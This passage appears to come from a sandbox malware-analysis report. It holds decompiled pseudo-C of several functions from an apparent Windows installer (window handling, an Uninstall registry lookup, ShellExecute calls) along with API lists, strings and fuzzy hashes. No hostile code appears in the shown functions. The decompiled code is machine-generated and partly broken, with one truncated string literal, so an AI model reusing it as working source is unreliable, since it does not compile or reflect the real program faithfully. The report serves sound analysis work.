					if( *0x49b0bb == 0) {
						_t25 =  *0x49b36d; // 0x2
						_t26 = _t25 - 1;
						__eflags = _t26;
						if(__eflags < 0) {
							_t27 =  *0x49b048; // 0x22877c0
							__eflags =  *((intOrPtr*)(_t27 + 0x340)) - 0xb;
							if( *((intOrPtr*)(_t27 + 0x340)) != 0xb) {
								_t28 =  *0x49b048; // 0x22877c0
								_t6 = _t28 + 0x25c; // 0x2297490
								_t7 =  *_t6 + 0x101; // 0xe000001
								 *0x49b377 =  *_t7;
							} else {
								_t40 =  *0x49b048; // 0x22877c0
								_t4 = _t40 + 0x2f0; // 0x229638c
								_t5 =  *_t4 + 0x101; // 0x1e000001
								 *0x49b377 =  *_t5;
							}
						} else {
							if(__eflags == 0) {
								_t43 =  *0x49b048; // 0x22877c0
								__eflags =  *((intOrPtr*)(_t43 + 0x340)) - 0xb;
								if( *((intOrPtr*)(_t43 + 0x340)) != 0xb) {
									E00465B80(0x52,  &_v12);
								} else {
									_t48 =  *0x49b048; // 0x22877c0
									_t9 = _t48 + 0x344; // 0x0
									_push( *_t9);
									_push(0x4816e0);
									_push(0x4816e0);
									_push(0x4816e0);
									E00465B80(0x52,  &_v16);
									_push(_v16);
									E00403634();
								}
								_t60 = 1;
								_t47 = E0047D0CC(_v12, _t59, 1, 0, _t74, _t75, 6, 1, 4);
								__eflags = _t47 - 6;
								 *0x49b377 = _t47 == 6;
							} else {
								__eflags = _t26 == 1;
								if(_t26 == 1) {
									 *0x49b377 = 1;
								}
							}
						}
					} else {
						 *0x49b377 = 0;
					}
					__eflags =  *0x49b377;
					if( *0x49b377 == 0) {
						E00456B58("Will not restart Windows automatically.", _t59, _t60, _t74, _t75);
					}
				} else {
					E004813FC(_t59, _t60, _t74, _t75);
				}
				E00480630(_v8, 1, 3);
				_pop(_t67);
				 *[fs:eax] = _t67;
				E0047FDE8();
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(0x4816d0);
				return E00403420( &_v16, 2);
			}

0x00481500
0x00481500
0x00481500
0x00481501
0x00481503
0x00481505
0x00481507
0x00481509
0x0048150a
0x0048150b
0x0048150c
0x00481511
0x00481512
0x00481517
0x0048151a
0x0048151f
0x00481520
0x00481525
0x00481528
0x0048152b
0x00481530
0x00481535
0x0048153e
0x00481540
0x00481549
0x00481549
0x00481553
0x0048155f
0x0048156b
0x00481572
0x00481574
0x00481579
0x00481579
0x0048157e
0x00481585
0x00481593
0x00481598
0x00481598
0x0048159a
0x004815ab
0x004815b0
0x004815b7
0x004815d4
0x004815d9
0x004815df
0x004815e5
0x004815b9
0x004815b9
0x004815be
0x004815c4
0x004815ca
0x004815ca
0x0048159c
0x0048159c
0x004815ec
0x004815f1
0x004815f8
0x00481635
0x004815fa
0x004815fa
0x004815ff
0x004815ff
0x00481605
0x0048160a
0x0048160f
0x00481619
0x0048161e
0x00481629
0x00481629
0x00481640
0x00481647
0x0048164c
0x0048164f
0x0048159e
0x0048159e
0x004815a0
0x00481658
0x00481658
0x004815a0
0x0048159c
0x00481587
0x00481587
0x00481587
0x0048165f
0x00481666
0x0048166d
0x0048166d
0x00481561
0x00481561
0x00481561
0x00481679
0x00481680
0x00481683
0x004816a9
0x004816b0
0x004816b3
0x004816b6
0x004816c8

APIs

GetForegroundWindow.USER32(00000000,00481688,?,00000000,004816C9,?,?,00000001,?,00000000,00000000,00000000,?,0046AC04), ref: 00481537
SetActiveWindow.USER32(?,00000000,00481688,?,00000000,004816C9,?,?,00000001,?,00000000,00000000,00000000,?,0046AC04), ref: 00481549

Strings

Will not restart Windows automatically., xrefs: 00481668

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 3f2bacaa5b7b71fe330372b93cdb61d20faa103d02b55630c111f31e38bb162a
Instruction ID: 254dfa7ac69c38db29eebec8b42d51047f3deaee97367967ade6519332545e1e
Opcode Fuzzy Hash: 3f2bacaa5b7b71fe330372b93cdb61d20faa103d02b55630c111f31e38bb162a
Instruction Fuzzy Hash: F141F430604240EFD711EB64E942BAD3BEEE764304F1808B7E84567372E37C98468B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00424928 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00424928(void* __eax, void* __ebx, void* __edi, void* __esi) {
				struct tagPOINT _v12;
				char _v13;
				char _v20;
				char _v24;
				intOrPtr _t41;
				intOrPtr _t49;
				void* _t57;
				intOrPtr _t67;
				void* _t73;
				intOrPtr _t75;
				void* _t78;

				_v20 = 0;
				_v24 = 0;
				_t57 = __eax;
				_push(_t78);
				_push(0x424a41);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffffec;
				GetCursorPos( &_v12);
				_t75 = E00414114( &_v12, 1);
				if(_t75 != 0 && ( *(_t75 + 0x1c) & 0x00000010) != 0) {
					_t75 = 0;
				}
				_t73 = E0041399C();
				if(_t75 !=  *((intOrPtr*)(_t57 + 0x2c))) {
					if( *((intOrPtr*)(_t57 + 0x2c)) == 0 || _t73 != 0) {
						if(_t73 != 0 && _t73 ==  *((intOrPtr*)(_t57 + 0x2c))) {
							goto L8;
						}
					} else {
						L8:
						_t58 = 0;
						E00415228( *((intOrPtr*)(_t57 + 0x2c)), 0, 0xb014, 0);
					}
					 *((intOrPtr*)(_t57 + 0x2c)) = _t75;
					if( *((intOrPtr*)(_t57 + 0x2c)) == 0 || _t73 != 0) {
						if(_t73 != 0 && _t73 ==  *((intOrPtr*)(_t57 + 0x2c))) {
							goto L13;
						}
					} else {
						L13:
						_t58 = 0;
						E00415228( *((intOrPtr*)(_t57 + 0x2c)), 0, 0xb013, 0);
					}
				}
				if( *((char*)(_t57 + 0x64)) != 0) {
					_t49 =  *((intOrPtr*)(_t57 + 0x2c));
					if(_t49 == 0) {
						L17:
						E00424CA0(_t57);
					} else {
						_t96 = _t49 -  *((intOrPtr*)(_t57 + 0x60));
						if(_t49 ==  *((intOrPtr*)(_t57 + 0x60))) {
							goto L17;
						}
					}
				}
				_t19 =  &_v24; // 0x496f63
				E00423450(_t75, _t19);
				_t20 =  &_v24; // 0x496f63
				E00413958( *_t20, _t58,  &_v20);
				_t41 =  *0x49a628; // 0x2262410
				E00424ADC(_t41, _v20, _t73, _t96);
				_v13 = 1;
				if( *((short*)(_t57 + 0xae)) != 0) {
					 *((intOrPtr*)(_t57 + 0xac))();
				}
				if(_v13 != 0) {
					WaitMessage();
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424A48);
				_t29 =  &_v24; // 0x496f63
				return E00403420(_t29, 2);
			}

0x00424933
0x00424936
0x00424939
0x0042493d
0x0042493e
0x00424943
0x00424946
0x0042494d
0x0042495c
0x00424960
0x00424968
0x00424968
0x0042496f
0x00424974
0x0042497a
0x00424982
0x00000000
0x00000000
0x00424989
0x00424989
0x0042498b
0x00424995
0x00424995
0x0042499a
0x004249a1
0x004249a9
0x00000000
0x00000000
0x004249b0
0x004249b0
0x004249b2
0x004249bc
0x004249bc
0x004249a1
0x004249c5
0x004249c7
0x004249cc
0x004249d3
0x004249d5
0x004249ce
0x004249ce
0x004249d1
0x00000000
0x00000000
0x004249d1
0x004249cc
0x004249da
0x004249df
0x004249e4
0x004249ea
0x004249f2
0x004249f7
0x004249fc
0x00424a08
0x00424a15
0x00424a15
0x00424a1f
0x00424a21
0x00424a21
0x00424a28
0x00424a2b
0x00424a2e
0x00424a33
0x00424a40

APIs

GetCursorPos.USER32(?), ref: 0042494D
WaitMessage.USER32(00000000,00424A41,?,?,?,?), ref: 00424A21

Strings

coI, xrefs: 004249DA, 004249E4, 00424A33

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorMessageWait
String ID: coI
API String ID: 4021538199-1488265783
Opcode ID: 9cd7eb64ed9fb77526c24434481c4f91bcece4e91d8d3d24096384cf43a00bf1
Instruction ID: 29e41b0b5ff4de018dadf6b1b630a4be1df661cdf43175d7bf3e4b0652e8eab1
Opcode Fuzzy Hash: 9cd7eb64ed9fb77526c24434481c4f91bcece4e91d8d3d24096384cf43a00bf1
Instruction Fuzzy Hash: 9031D2B17002248BCB11EF79E88579FB7A5EFC8304F95456AE808A7386D778DD80CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0046B8C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0046B8C8(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t27;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t51;
				void* _t59;
				void* _t61;
				intOrPtr _t64;

				_push(0xfff5);
				_push(_t61);
				_push(_t59);
				_v8 = __eax;
				L1:
				while(1) {
					do {
						if( *((intOrPtr*)(_v8 + 0x340)) == 0xb && ( *0x49b376 == 0 ||  *0x49b0bb != 0)) {
							E0047D0CC( *((intOrPtr*)(_v8 + 0x344)), 0xfff5, 3, 0, _t59, _t61, 1, 1, 0);
							if( *0x49b376 == 0 ||  *0x49b0d4 == 0) {
								 *0x49b3b0 = 2;
							} else {
								_t51 =  *0x49b0d4; // 0x0
								 *0x49b3b0 = _t51;
							}
							E00408BC0();
						}
						_v12 =  *((intOrPtr*)(_v8 + 0x340));
						_push(0x46b97f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						_t27 = E00418138( *((intOrPtr*)(_v8 + 0x1bc)), 0);
						_t70 = _t27;
						if(_t27 != 0) {
							E00402C00( *((intOrPtr*)(_v8 + 0x1bc)), 0xfff5, 3, _t70);
						}
						_pop(0);
						_pop(3);
						 *[fs:eax] = 0;
						_t29 = _v8;
						if( *((char*)(_t29 + 0x33d)) == 0) {
							goto L13;
						}
						L17:
						return _t29;
						L13:
					} while ( *((intOrPtr*)(_v8 + 0x340)) != _v12);
					_t32 =  *0x49b088; // 0x2286214
					if( *((char*)(_t32 + 0x1ba)) > 1) {
						E00456B58("Failed to proceed to next wizard page; showing wizard.", 0xfff5, 3, _t59, _t61);
						E0047C854(1);
						_t37 =  *0x49a628; // 0x2262410
						E004241C4(_t37);
						_t39 =  *0x49a628; // 0x2262410
						SetActiveWindow( *(_t39 + 0x20));
						_t42 =  *0x49b048; // 0x22877c0
						_t29 = E00422DEC(_t42);
					} else {
						E00456B58("Failed to proceed to next wizard page; aborting.", 0xfff5, 3, _t59, _t61);
						E00408BC0();
						continue;
					}
					goto L17;
				}
			}

0x0046b8ce
0x0046b8cf
0x0046b8d0
0x0046b8d1
0x00000000
0x0046b8d4
0x0046b8d4
0x0046b8de
0x0046b905
0x0046b911
0x0046b928
0x0046b91c
0x0046b91c
0x0046b921
0x0046b921
0x0046b932
0x0046b932
0x0046b940
0x0046b946
0x0046b94b
0x0046b94e
0x0046b95a
0x0046b95f
0x0046b961
0x0046b970
0x0046b970
0x0046b977
0x0046b979
0x0046b97a
0x0046b9ab
0x0046b9b5
0x00000000
0x00000000
0x0046ba1e
0x0046ba24
0x0046b9b7
0x0046b9c0
0x0046b9c9
0x0046b9d5
0x0046b9f0
0x0046b9f7
0x0046b9fc
0x0046ba01
0x0046ba06
0x0046ba0f
0x0046ba14
0x0046ba19
0x0046b9d7
0x0046b9dc
0x0046b9e1
0x00000000
0x0046b9e1
0x00000000
0x0046b9d5

Strings

Failed to proceed to next wizard page; aborting., xrefs: 0046B9D7
Failed to proceed to next wizard page; showing wizard., xrefs: 0046B9EB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 3c374b80a55c8dcbad6b4286dc741b37f39de5f616afe605c4fd7e84cbe6f9a0
Instruction ID: f6f5def29fd01a76a0e70968f9f656ccb6497193a2f872ccb259e7a909502bc5
Opcode Fuzzy Hash: 3c374b80a55c8dcbad6b4286dc741b37f39de5f616afe605c4fd7e84cbe6f9a0
Instruction Fuzzy Hash: 1631C470A04244EFDB11EB59E985B9977E4EB15304F1400BBF944DB3A2E7386D84C79E

Uniqueness

Uniqueness Score: -1.00%

Function 004775B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004775B8(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				void* _t35;
				intOrPtr _t36;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t50 = __ecx;
				_t73 = _t74;
				_t75 = _t74 + 0xffffffe0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __edx;
				_t48 = __eax;
				_push(_t73);
				_push(0x4776b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E00403494(_a4, __ecx);
				if(_t48 == 0) {
					L5:
					_pop(_t60);
					 *[fs:eax] = _t60;
					_push(0x4776c0);
					return E00403420( &_v20, 2);
				} else {
					E00477544(_t48, _t50,  &_v16);
					_t71 = 2;
					_t49 = 0x498c44;
					while(1) {
						_v36 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v32 = 0xb;
						_v28 = _v16;
						_v24 = 0xb;
						E004078D4("%s\\%s_is1", 1,  &_v36,  &_v20);
						_t35 = E00403738(_v20);
						_t36 =  *0x498c3c; // 0x1
						if(E0042DD1C(_t36, _t35,  *_t49,  &_v12, 1, 0) == 0) {
							break;
						}
						_t49 = _t49 + 4;
						_t71 = _t71 - 1;
						if(_t71 != 0) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_push(_t73);
					_push(0x47768d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t75;
					E00403738(_v8);
					E0042DC4C();
					_pop(_t66);
					 *[fs:eax] = _t66;
					_push(0x47769e);
					return RegCloseKey(_v12);
				}
				L6:
			}

0x004775b8
0x004775b9
0x004775bb
0x004775c3
0x004775c6
0x004775cb
0x004775ce
0x004775d5
0x004775d6
0x004775db
0x004775de
0x004775e5
0x004775ec
0x0047769e
0x004776a0
0x004776a3
0x004776a6
0x004776b8
0x004775f2
0x004775f7
0x004775fc
0x00477601
0x00477606
0x00477617
0x0047761a
0x00477621
0x00477624
0x00477635
0x0047763d
0x00477646
0x00477652
0x00000000
0x00000000
0x00477694
0x00477697
0x00477698
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00477698
0x00477656
0x00477657
0x0047765c
0x0047765f
0x00477665
0x00477671
0x00477678
0x0047767b
0x0047767e
0x0047768c
0x0047768c
0x00000000

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,0047769E,?,?,00000001,00000000,00000000,004776B9), ref: 00477687

Strings

%s\%s_is1, xrefs: 00477630
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00477612

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 5c46ab6b9a0829493843b83eff8f251c7cec3d7ed61a6bdc21eab3c4f24e7e50
Instruction ID: c3e4b7c1c29be41fb09634d7eb1c3f6661502ee037a036ab57c0af5e881dc35e
Opcode Fuzzy Hash: 5c46ab6b9a0829493843b83eff8f251c7cec3d7ed61a6bdc21eab3c4f24e7e50
Instruction Fuzzy Hash: 70218474B086446FDB01DFA9C851A9EBBE8EB49314F90847AE404E7385D7789D01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044F688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0044F688(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _t27;
				intOrPtr _t31;
				char* _t47;
				void* _t52;
				intOrPtr _t59;
				void* _t71;

				_v16 = 0;
				_t52 = __eax;
				_push(_t71);
				_push(0x44f769);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffffe8;
				_t27 =  *((intOrPtr*)(__edx + 8));
				if( *((intOrPtr*)(_t27 + 8)) == 0x70b &&  *((intOrPtr*)(_t27 + 0xc)) == 0x202) {
					_v12 =  *((intOrPtr*)(_t27 + 0x18));
					_v8 =  *((intOrPtr*)(_t27 + 0x1c));
					_t31 = _v12;
					if(_t31 >= 0 && _t31 < _v8) {
						_t33 = _v8 - _t31 + 1;
						if(_v8 - _t31 + 1 > 1) {
							E004038A4( &_v16, _t33);
							_v28 = _v12;
							_v24 = _v8;
							_v20 = E00403738(_v16);
							E004038A4( &_v16, SendMessageA(E004181C8(_t52), 0x44b, 0,  &_v28));
							if(_v16 != 0) {
								_t47 = E00403738(_v16);
								ShellExecuteA(E004181C8(_t52), "open", _t47, 0, 0, 1);
							}
						}
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x44f770);
				return E00403400( &_v16);
			}

0x0044f693
0x0044f696
0x0044f69a
0x0044f69b
0x0044f6a0
0x0044f6a3
0x0044f6a6
0x0044f6b2
0x0044f6c8
0x0044f6ce
0x0044f6d1
0x0044f6d6
0x0044f6e4
0x0044f6e8
0x0044f6ee
0x0044f6f6
0x0044f6fc
0x0044f707
0x0044f727
0x0044f730
0x0044f73b
0x0044f74e
0x0044f74e
0x0044f730
0x0044f6e8
0x0044f6d6
0x0044f755
0x0044f758
0x0044f75b
0x0044f768

APIs

SendMessageA.USER32 ref: 0044F71D
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F74E

Strings

open, xrefs: 0044F741

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: 47946048d81870153123e7feea5053f61f30da06cc5aaf61faa1fdf859672c9f
Instruction ID: 07fa3aa9e6481adb3f177055b8311fd08e471a5f432c7923df0ec2ee9cc2f724
Opcode Fuzzy Hash: 47946048d81870153123e7feea5053f61f30da06cc5aaf61faa1fdf859672c9f
Instruction Fuzzy Hash: 41217170E00204AFEB00DF69C882A9EB7F9EB44714F60857AF404E7291D77CAA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004544AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004544AC(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				signed int _t37;
				void* _t51;
				intOrPtr _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t71;

				_v8 = __ecx;
				_t66 = __edx;
				_t51 = __eax;
				_t68 = _a4;
				E00403728(_a20);
				_push(_t71);
				_push(0x454591);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffffc0;
				if(_a20 == 0) {
					E0042C848(_t66, __ecx,  &_a20);
					if(_a20 == 0) {
						E0042D868( &_a20);
					}
				}
				E00402934( &_v68, 0x3c);
				_v68 = 0x3c;
				_v64 = 0x540;
				if(_t51 != 0) {
					_v56 = E00403738(_t51);
				}
				_v52 = E00403738(_t66);
				_v48 = E00403738(_v8);
				_v44 = E00403738(_a20);
				_v40 = _a12;
				_t37 =  &_v68;
				_push(_t37);
				L0042CC48();
				asm("sbb ebx, ebx");
				_t54 =  ~( ~_t37);
				if( ~( ~_t37) != 0) {
					 *_t68 = 0x103;
					_t38 = _v12;
					if(_v12 != 0) {
						E00454198(_t38, _t54, _a16, _t66, _t68, _t68);
					}
				} else {
					 *_t68 = GetLastError();
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00454598);
				return E00403400( &_a20);
			}

0x004544b5
0x004544b8
0x004544ba
0x004544bc
0x004544c2
0x004544c9
0x004544ca
0x004544cf
0x004544d2
0x004544d9
0x004544e0
0x004544e9
0x004544ee
0x004544ee
0x004544e9
0x004544fd
0x00454502
0x00454509
0x00454512
0x0045451b
0x0045451b
0x00454525
0x00454530
0x0045453b
0x00454541
0x00454544
0x00454547
0x00454548
0x00454551
0x00454553
0x00454557
0x00454562
0x00454568
0x0045456d
0x00454576
0x00454576
0x00454559
0x0045455e
0x0045455e
0x0045457d
0x00454580
0x00454583
0x00454590

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 00454548
GetLastError.KERNEL32(0000003C,00000000,00454591,?,?,?), ref: 00454559

Part of subcall function 0042D868: GetSystemDirectoryA.KERNEL32 ref: 0042D87B

Strings

<, xrefs: 00454502

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <
API String ID: 893404051-4251816714
Opcode ID: 58aeaf905f3f467ad630160d5addbe77d4166b81bed2c2b576aed89019a82919
Instruction ID: 2758f0baa38893e3594e4aedfeffe3f84d614776496217f8315c959fe0903a0f
Opcode Fuzzy Hash: 58aeaf905f3f467ad630160d5addbe77d4166b81bed2c2b576aed89019a82919
Instruction Fuzzy Hash: CE219970A00249AFDB10EF65C88169E7BF8EF44349F50443AF844EB381E7789E45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00402584(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t24;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t45;

				_t43 = _t45;
				_t40 = __edx;
				_t24 = __eax;
				if( *0x49a419 != 0 || E004019CC() != 0) {
					_push(_t43);
					_push("\xef\xbf					_push( *[fs:edx]);
					 *[fs:edx] = _t45;
					if( *0x49a036 != 0) {
						_push(0x49a420);
						L00401328();
					}
					if(E004023B4(_t24, _t40) == 0) {
						_t37 = E00402088(_t40);
						_t14 = ( *(_t24 - 4) & 0x7ffffffc) - 4;
						if(_t40 < ( *(_t24 - 4) & 0x7ffffffc) - 4) {
							_t14 = _t40;
						}
						if(_t37 != 0) {
							E00402738(_t24, _t14, _t37);
							E00402210(_t24);
						}
						_v8 = _t37;
					} else {
						_v8 = _t24;
					}
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E0040263D);
					if( *0x49a036 != 0) {
						_push(0x49a420);
						L00401330();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00402585
0x0040258b
0x0040258d
0x00402596
0x004025ad
0x004025ae
0x004025b3
0x004025b6
0x004025c0
0x004025c2
0x004025c7
0x004025c7
0x004025d7
0x004025e5
0x004025f3
0x004025f8
0x004025fa
0x004025fa
0x004025fe
0x00402606
0x0040260d
0x0040260d
0x00402612
0x004025d9
0x004025d9
0x004025d9
0x00402617
0x0040261a
0x0040261d
0x00402629
0x0040262b
0x00402630
0x00000000
0x00402630
0x00402635
0x004025a1
0x004025a3
0x00402645
0x00402645

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
